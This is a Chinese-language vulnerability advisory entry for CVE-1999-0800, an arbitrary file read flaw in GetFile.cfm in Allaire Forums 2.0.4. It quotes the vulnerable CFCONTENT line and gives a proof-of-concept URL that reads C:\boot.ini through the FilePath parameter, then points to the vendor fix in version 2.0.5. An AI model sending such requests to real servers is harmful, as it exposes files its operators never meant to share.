Allaire Forums GetFile.cfm远程读取任意文件漏洞
添加时间:
2005-08-11
系统编号:
WAVDB-00010
BugCVE: CVE-1999-0800
BUGTRAQ: 229
影响版本:
Allaire Forums 2.0.4
程序介绍:
漏洞利用:
2005-08-11
系统编号:
WAVDB-00010
BugCVE: CVE-1999-0800
BUGTRAQ: 229
影响版本:
Allaire Forums 2.0.4
程序介绍:
Allaire Forums 是Allaire出品的一个论坛,运行在Coldfusion环境下。
漏洞分析:
Allaire Forums 2.0.4版及其以前版本的一个文件存在安全问题。可以被远程入侵者用来获取服务器上的任意文件。
文件“GetFile.cfm”通常在Web应用程序的根目录下,由于这一行代码的问题:
<CFCONTENT TYPE= #FT#/#FST# FILE= #FilePath# >
可以在指定绝对路径的情况下获取服务器上的任意文件,只要发出如下请求:
http://target/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini
漏洞利用:
http://target/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini
解决方案:
厂商补丁:
Allaire
-------
Allaire已经为此发布了一个安全公告(ASB99-05)并在2.0.5版中解决了此问题:
ASB99-05:Allaire Forums Security Issues
链接:
补丁下载:
http://www.allaire.com/security
信息来源:
<*来源:Cameron Childress (cameronc@MCRAE.COM)链接:*>